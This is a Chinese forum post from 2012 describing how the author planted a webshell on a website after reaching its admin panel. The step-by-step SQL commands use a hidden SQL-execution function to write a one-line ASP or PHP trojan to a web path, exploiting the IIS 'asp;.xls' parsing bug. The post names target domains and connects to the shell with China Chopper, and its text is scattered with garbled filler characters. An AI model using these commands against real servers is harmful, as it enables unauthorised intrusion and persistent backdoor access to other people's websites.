好不容易进了后台,发现啥上传啊。备份啊多木有。
; w2 {0 l+ d* i' Y9 fwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
8 [0 o0 t6 C, k6 T0 J% @文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
) ?" e8 o% C3 h, A% @: h然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:# q3 ^9 Y7 V" c7 v/ F5 ?
1.create table cmd (a varchar(50))
+ f }: X6 }- q. b" Z, C: F2.insert into cmd (a) values (‘‘)
) c& J5 B) Y: J1 b& r7 y3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd; [ `7 k7 f4 ~" [3 h$ P. K4 s
(把表cmd的内容导出为物理路径的一个EXCEL文件)" e, H, U/ c: G$ W1 [7 S
4.drop table cmd" s3 ~% t: F$ ~* F& c) a
利用IIS的BUG成功拿到了WEBSHELL。
/ r0 o5 g/ k d/ c" M* \% X1 O9 q$ C
: R% F5 I- X1 o" ?' [直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话2 R6 F( b+ q- u& T/ v
u7 G+ V% K! q4 R Y" M. R SQL语句意思解释:, V! [2 C+ y$ Q: o) R
第一句
- w6 Z6 c/ \/ k0 F 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 b' _4 U, S$ s/ N5 ~7 R9 ^. }! ?2 d. _! Y* T9 l( ]/ @
第二句# L5 x) e. A+ b z: S: D
在表cmd的a字段插入一句话木马
) P h- J6 }. C# W8 U0 E 第三句* A' g0 T1 T! i% j% b* t& G
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 M1 j% W, s6 e/ c s# X
4 R# ^- g' o: ]" b
第四句' J; T1 T- H% V( s6 v! p- ~
删除建立的cmd表
8 t o6 V" n# ]
1 s: e5 F4 i/ C, g 以下内容为测试: x* p- _4 U4 U5 ]$ N* C
Access利用后台SQL执行命令功能导出WebShell:% w& H5 h8 N# t8 z4 H4 M% m
这个更简单:4 i1 x; v% K/ Q" t: @
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]" T; h) @" n2 N3 E# P: F; E( w: ~# m
或者9 @, s7 q# ?! @
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]3 x$ q: Y( r& v
+ o4 q; s" D) i% L! \8 f
后台有执行SQL语句功能(vote为已知表段)8 t/ H$ `6 E# L& S2 l0 n$ z
希望对大家有所帮助拿shell的又一个思路4 m7 Q1 \* \9 v; R s
|
发表于 2012-9-13 17:53:58
收藏
支持
反对